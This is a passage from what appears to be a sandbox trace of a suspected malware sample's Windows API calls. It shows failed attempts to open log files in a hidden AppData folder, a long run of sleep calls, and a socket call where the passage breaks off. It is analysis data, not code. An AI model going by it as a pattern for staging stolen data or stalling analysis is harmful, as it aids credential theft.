EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.070] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0224.070] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0224.070] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.070] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.070] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0224.071] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0224.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.071] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.071] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0224.071] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0224.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.071] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.071] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0224.071] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0224.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.071] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.071] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0224.071] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0224.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.071] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.071] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0224.071] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0224.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.071] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.071] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0224.071] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0224.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.071] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.072] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0224.072] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0224.072] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.072] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.072] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0224.072] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0224.072] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.072] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.072] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0224.072] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0224.072] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.072] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.072] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0224.072] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0224.072] Sleep (dwMilliseconds=0x7d0) [0224.073] Sleep (dwMilliseconds=0x7d0) [0224.075] Sleep (dwMilliseconds=0x7d0) [0224.076] Sleep (dwMilliseconds=0x7d0) [0224.078] Sleep (dwMilliseconds=0x7d0) [0224.079] Sleep (dwMilliseconds=0x7d0) [0224.081] Sleep (dwMilliseconds=0x7d0) [0224.082] Sleep (dwMilliseconds=0x7d0) [0224.084] Sleep (dwMilliseconds=0x7d0) [0224.085] Sleep (dwMilliseconds=0x7d0) [0224.087] Sleep (dwMilliseconds=0x7d0) [0224.088] Sleep (dwMilliseconds=0x7d0) [0224.090] Sleep (dwMilliseconds=0x7d0) [0224.091] Sleep (dwMilliseconds=0x7d0) [0224.093] Sleep (dwMilliseconds=0x7d0) [0224.094] Sleep (dwMilliseconds=0x7d0) [0224.096] Sleep (dwMilliseconds=0x7d0) [0224.097] Sleep (dwMilliseconds=0x7d0) [0224.099] Sleep (dwMilliseconds=0x7d0) [0224.101] Sleep (dwMilliseconds=0x7d0) [0224.102] Sleep (dwMilliseconds=0x7d0) [0224.103] Sleep (dwMilliseconds=0x7d0) [0224.105] Sleep (dwMilliseconds=0x7d0) [0224.106] Sleep (dwMilliseconds=0x7d0) [0224.108] Sleep (dwMilliseconds=0x7d0) [0224.109] Sleep (dwMilliseconds=0x7d0) [0224.111] Sleep (dwMilliseconds=0x7d0) [0224.112] Sleep (dwMilliseconds=0x7d0) [0224.114] Sleep (dwMilliseconds=0x7d0) [0224.115] Sleep (dwMilliseconds=0x7d0) [0224.117] Sleep (dwMilliseconds=0x7d0) [0224.118] Sleep (dwMilliseconds=0x7d0) [0224.120] Sleep (dwMilliseconds=0x7d0) [0224.121] Sleep (dwMilliseconds=0x7d0) [0224.123] Sleep (dwMilliseconds=0x7d0) [0224.124] Sleep (dwMilliseconds=0x7d0) [0224.126] Sleep (dwMilliseconds=0x7d0) [0224.127] Sleep (dwMilliseconds=0x7d0) [0224.129] Sleep (dwMilliseconds=0x7d0) [0224.130] Sleep (dwMilliseconds=0x7d0) [0224.132] Sleep (dwMilliseconds=0x7d0) [0224.133] Sleep (dwMilliseconds=0x7d0) [0224.135] Sleep (dwMilliseconds=0x7d0) [0224.136] Sleep (dwMilliseconds=0x7d0) [0224.138] Sleep (dwMilliseconds=0x7d0) [0224.139] Sleep (dwMilliseconds=0x7d0) [0224.141] Sleep (dwMilliseconds=0x7d0) [0224.142] Sleep (dwMilliseconds=0x7d0) [0224.144] Sleep (dwMilliseconds=0x7d0) [0224.145] Sleep (dwMilliseconds=0x7d0) [0224.147] Sleep (dwMilliseconds=0x7d0) [0224.148] Sleep (dwMilliseconds=0x7d0) [0224.150] Sleep (dwMilliseconds=0x7d0) [0224.151] Sleep (dwMilliseconds=0x7d0) [0224.153] Sleep (dwMilliseconds=0x7d0) [0224.154] Sleep (dwMilliseconds=0x7d0) [0224.156] Sleep (dwMilliseconds=0x7d0) [0224.204] Sleep (dwMilliseconds=0x7d0) [0224.237] Sleep (dwMilliseconds=0x7d0) [0224.238] Sleep (dwMilliseconds=0x7d0) [0224.239] Sleep (dwMilliseconds=0x7d0) [0224.241] Sleep (dwMilliseconds=0x7d0) [0224.243] Sleep (dwMilliseconds=0x7d0) [0224.244] Sleep (dwMilliseconds=0x7d0) [0224.245] Sleep (dwMilliseconds=0x7d0) [0224.247] Sleep (dwMilliseconds=0x7d0) [0224.248] Sleep (dwMilliseconds=0x7d0) [0224.250] Sleep (dwMilliseconds=0x7d0) [0224.251] Sleep (dwMilliseconds=0x7d0) [0224.253] Sleep (dwMilliseconds=0x7d0) [0224.254] Sleep (dwMilliseconds=0x7d0) [0224.256] Sleep (dwMilliseconds=0x7d0) [0224.257] Sleep (dwMilliseconds=0x7d0) [0224.259] Sleep (dwMilliseconds=0x7d0) [0224.260] Sleep (dwMilliseconds=0x7d0) [0224.262] Sleep (dwMilliseconds=0x7d0) [0224.263] Sleep (dwMilliseconds=0x7d0) [0224.265] Sleep (dwMilliseconds=0x7d0) [0224.266] Sleep (dwMilliseconds=0x7d0) [0224.268] Sleep (dwMilliseconds=0x7d0) [0224.269] Sleep (dwMilliseconds=0x7d0) [0224.271] Sleep (dwMilliseconds=0x7d0) [0224.272] Sleep (dwMilliseconds=0x7d0) [0224.274] Sleep (dwMilliseconds=0x7d0) [0224.275] Sleep (dwMilliseconds=0x7d0) [0224.277] Sleep (dwMilliseconds=0x7d0) [0224.278] Sleep (dwMilliseconds=0x7d0) [0224.280] Sleep (dwMilliseconds=0x7d0) [0224.281] Sleep (dwMilliseconds=0x7d0) [0224.283] Sleep (dwMilliseconds=0x7d0) [0224.284] Sleep (dwMilliseconds=0x7d0) [0224.286] Sleep (dwMilliseconds=0x7d0) [0224.287] Sleep (dwMilliseconds=0x7d0) [0224.289] Sleep (dwMilliseconds=0x7d0) [0224.290] Sleep (dwMilliseconds=0x7d0) [0224.293] Sleep (dwMilliseconds=0x7d0) [0224.294] Sleep (dwMilliseconds=0x7d0) [0224.296] Sleep (dwMilliseconds=0x7d0) [0224.297] Sleep (dwMilliseconds=0x7d0) [0224.299] Sleep (dwMilliseconds=0x7d0) [0224.300] Sleep (dwMilliseconds=0x7d0) [0224.302] Sleep (dwMilliseconds=0x7d0) [0224.303] Sleep (dwMilliseconds=0x7d0) [0224.305] Sleep (dwMilliseconds=0x7d0) [0224.306] Sleep (dwMilliseconds=0x7d0) [0224.308] Sleep (dwMilliseconds=0x7d0) [0224.309] Sleep (dwMilliseconds=0x7d0) [0224.311] Sleep (dwMilliseconds=0x7d0) [0224.312] Sleep (dwMilliseconds=0x7d0) [0224.314] Sleep (dwMilliseconds=0x7d0) [0224.315] Sleep (dwMilliseconds=0x7d0) [0224.317] Sleep (dwMilliseconds=0x7d0) [0224.318] Sleep (dwMilliseconds=0x7d0) [0224.320] Sleep (dwMilliseconds=0x7d0) [0224.321] Sleep (dwMilliseconds=0x7d0) [0224.323] Sleep (dwMilliseconds=0x7d0) [0224.324] Sleep (dwMilliseconds=0x7d0) [0224.326] Sleep (dwMilliseconds=0x7d0) [0224.328] Sleep (dwMilliseconds=0x7d0) [0224.329] Sleep (dwMilliseconds=0x7d0) [0224.330] Sleep (dwMilliseconds=0x7d0) [0224.332] Sleep (dwMilliseconds=0x7d0) [0224.333] Sleep (dwMilliseconds=0x7d0) [0224.335] Sleep (dwMilliseconds=0x7d0) [0224.336] Sleep (dwMilliseconds=0x7d0) [0224.338] Sleep (dwMilliseconds=0x7d0) [0224.339] Sleep (dwMilliseconds=0x7d0) [0224.341] Sleep (dwMilliseconds=0x7d0) [0224.342] Sleep (dwMilliseconds=0x7d0) [0224.344] Sleep (dwMilliseconds=0x7d0) [0224.345] Sleep (dwMilliseconds=0x7d0) [0224.347] Sleep (dwMilliseconds=0x7d0) [0224.348] Sleep (dwMilliseconds=0x7d0) [0224.350] Sleep (dwMilliseconds=0x7d0) [0224.351] Sleep (dwMilliseconds=0x7d0) [0224.353] Sleep (dwMilliseconds=0x7d0) [0224.354] Sleep (dwMilliseconds=0x7d0) [0224.356] Sleep (dwMilliseconds=0x7d0) [0224.357] Sleep (dwMilliseconds=0x7d0) [0224.359] Sleep (dwMilliseconds=0x7d0) [0224.360] Sleep (dwMilliseconds=0x7d0) [0224.362] Sleep (dwMilliseconds=0x7d0) [0224.363] Sleep (dwMilliseconds=0x7d0) [0224.388] Sleep (dwMilliseconds=0x7d0) [0224.389] Sleep (dwMilliseconds=0x7d0) [0224.391] Sleep (dwMilliseconds=0x7d0) [0224.395] Sleep (dwMilliseconds=0x7d0) [0224.396] Sleep (dwMilliseconds=0x7d0) [0224.397] Sleep (dwMilliseconds=0x7d0) [0224.399] Sleep (dwMilliseconds=0x7d0) [0224.400] Sleep (dwMilliseconds=0x7d0) [0224.402] Sleep (dwMilliseconds=0x7d0) [0224.403] Sleep (dwMilliseconds=0x7d0) [0224.405] Sleep (dwMilliseconds=0x7d0) [0224.406] Sleep (dwMilliseconds=0x7d0) [0224.408] Sleep (dwMilliseconds=0x7d0) [0224.409] Sleep (dwMilliseconds=0x7d0) [0224.411] Sleep (dwMilliseconds=0x7d0) [0224.412] Sleep (dwMilliseconds=0x7d0) [0224.414] Sleep (dwMilliseconds=0x7d0) [0224.415] Sleep (dwMilliseconds=0x7d0) [0224.417] Sleep (dwMilliseconds=0x7d0) [0224.418] Sleep (dwMilliseconds=0x7d0) [0224.420] Sleep (dwMilliseconds=0x7d0) [0224.421] Sleep (dwMilliseconds=0x7d0) [0224.423] Sleep (dwMilliseconds=0x7d0) [0224.424] Sleep (dwMilliseconds=0x7d0) [0224.426] Sleep (dwMilliseconds=0x7d0) [0224.427] Sleep (dwMilliseconds=0x7d0) [0224.429] Sleep (dwMilliseconds=0x7d0) [0224.430] Sleep (dwMilliseconds=0x7d0) [0224.432] Sleep (dwMilliseconds=0x7d0) [0224.433] Sleep (dwMilliseconds=0x7d0) [0224.435] Sleep (dwMilliseconds=0x7d0) [0224.437] Sleep (dwMilliseconds=0x7d0) [0224.438] Sleep (dwMilliseconds=0x7d0) [0224.440] Sleep (dwMilliseconds=0x7d0) [0224.441] Sleep (dwMilliseconds=0x7d0) [0224.443] Sleep (dwMilliseconds=0x7d0) [0224.444] Sleep (dwMilliseconds=0x7d0) [0224.446] Sleep (dwMilliseconds=0x7d0) [0224.447] Sleep (dwMilliseconds=0x7d0) [0224.449] Sleep (dwMilliseconds=0x7d0) [0224.450] Sleep (dwMilliseconds=0x7d0) [0224.452] Sleep (dwMilliseconds=0x7d0) [0224.453] Sleep (dwMilliseconds=0x7d0) [0224.455] Sleep (dwMilliseconds=0x7d0) [0224.456] Sleep (dwMilliseconds=0x7d0) [0224.458] Sleep (dwMilliseconds=0x7d0) [0224.459] Sleep (dwMilliseconds=0x7d0) [0224.461] Sleep (dwMilliseconds=0x7d0) [0224.462] Sleep (dwMilliseconds=0x7d0) [0224.464] Sleep (dwMilliseconds=0x7d0) [0224.465] Sleep (dwMilliseconds=0x7d0) [0224.467] Sleep (dwMilliseconds=0x7d0) [0224.468] Sleep (dwMilliseconds=0x7d0) [0224.470] Sleep (dwMilliseconds=0x7d0) [0224.471] Sleep (dwMilliseconds=0x7d0) [0224.473] Sleep (dwMilliseconds=0x7d0) [0224.474] Sleep (dwMilliseconds=0x7d0) [0224.476] Sleep (dwMilliseconds=0x7d0) [0224.477] Sleep (dwMilliseconds=0x7d0) [0224.479] Sleep (dwMilliseconds=0x7d0) [0224.480] Sleep (dwMilliseconds=0x7d0) [0224.482] Sleep (dwMilliseconds=0x7d0) [0224.483] Sleep (dwMilliseconds=0x7d0) [0224.485] Sleep (dwMilliseconds=0x7d0) [0224.486] Sleep (dwMilliseconds=0x7d0) [0224.488] Sleep (dwMilliseconds=0x7d0) [0224.489] Sleep (dwMilliseconds=0x7d0) [0224.491] Sleep (dwMilliseconds=0x7d0) [0224.494] Sleep (dwMilliseconds=0x7d0) [0224.495] Sleep (dwMilliseconds=0x7d0) [0224.496] Sleep (dwMilliseconds=0x7d0) [0224.498] Sleep (dwMilliseconds=0x7d0) [0224.499] Sleep (dwMilliseconds=0x7d0) [0224.501] Sleep (dwMilliseconds=0x7d0) [0224.502] Sleep (dwMilliseconds=0x7d0) [0224.504] Sleep (dwMilliseconds=0x7d0) [0224.505] Sleep (dwMilliseconds=0x7d0) [0224.507] Sleep (dwMilliseconds=0x7d0) [0224.508] Sleep (dwMilliseconds=0x7d0) [0224.510] Sleep (dwMilliseconds=0x7d0) [0224.511] Sleep (dwMilliseconds=0x7d0) [0224.513] Sleep (dwMilliseconds=0x7d0) [0224.514] Sleep (dwMilliseconds=0x7d0) [0224.516] Sleep (dwMilliseconds=0x7d0) [0224.517] Sleep (dwMilliseconds=0x7d0) [0224.519] Sleep (dwMilliseconds=0x7d0) [0224.520] Sleep (dwMilliseconds=0x7d0) [0224.522] Sleep (dwMilliseconds=0x7d0) [0224.523] Sleep (dwMilliseconds=0x7d0) [0224.525] Sleep (dwMilliseconds=0x7d0) [0224.526] Sleep (dwMilliseconds=0x7d0) [0224.528] Sleep (dwMilliseconds=0x7d0) [0224.529] Sleep (dwMilliseconds=0x7d0) [0224.531] Sleep (dwMilliseconds=0x7d0) [0224.532] Sleep (dwMilliseconds=0x7d0) [0224.534] Sleep (dwMilliseconds=0x7d0) [0224.535] Sleep (dwMilliseconds=0x7d0) [0224.537] Sleep (dwMilliseconds=0x7d0) [0224.538] Sleep (dwMilliseconds=0x7d0) [0224.540] Sleep (dwMilliseconds=0x7d0) [0224.542] Sleep (dwMilliseconds=0x7d0) [0224.543] Sleep (dwMilliseconds=0x7d0) [0224.544] Sleep (dwMilliseconds=0x7d0) [0224.546] Sleep (dwMilliseconds=0x7d0) [0224.547] Sleep (dwMilliseconds=0x7d0) [0224.549] Sleep (dwMilliseconds=0x7d0) [0224.550] Sleep (dwMilliseconds=0x7d0) [0224.552] Sleep (dwMilliseconds=0x7d0) [0224.553] Sleep (dwMilliseconds=0x7d0) [0224.555] Sleep (dwMilliseconds=0x7d0) [0224.556] Sleep (dwMilliseconds=0x7d0) [0224.558] Sleep (dwMilliseconds=0x7d0) [0224.559] Sleep (dwMilliseconds=0x7d0) [0224.561] Sleep (dwMilliseconds=0x7d0) [0224.562] Sleep (dwMilliseconds=0x7d0) [0224.564] Sleep (dwMilliseconds=0x7d0) [0224.565] Sleep (dwMilliseconds=0x7d0) [0224.567] Sleep (dwMilliseconds=0x7d0) [0224.568] Sleep (dwMilliseconds=0x7d0) [0224.570] Sleep (dwMilliseconds=0x7d0) [0224.571] Sleep (dwMilliseconds=0x7d0) [0224.573] Sleep (dwMilliseconds=0x7d0) [0224.574] Sleep (dwMilliseconds=0x7d0) [0224.576] Sleep (dwMilliseconds=0x7d0) [0224.675] socket 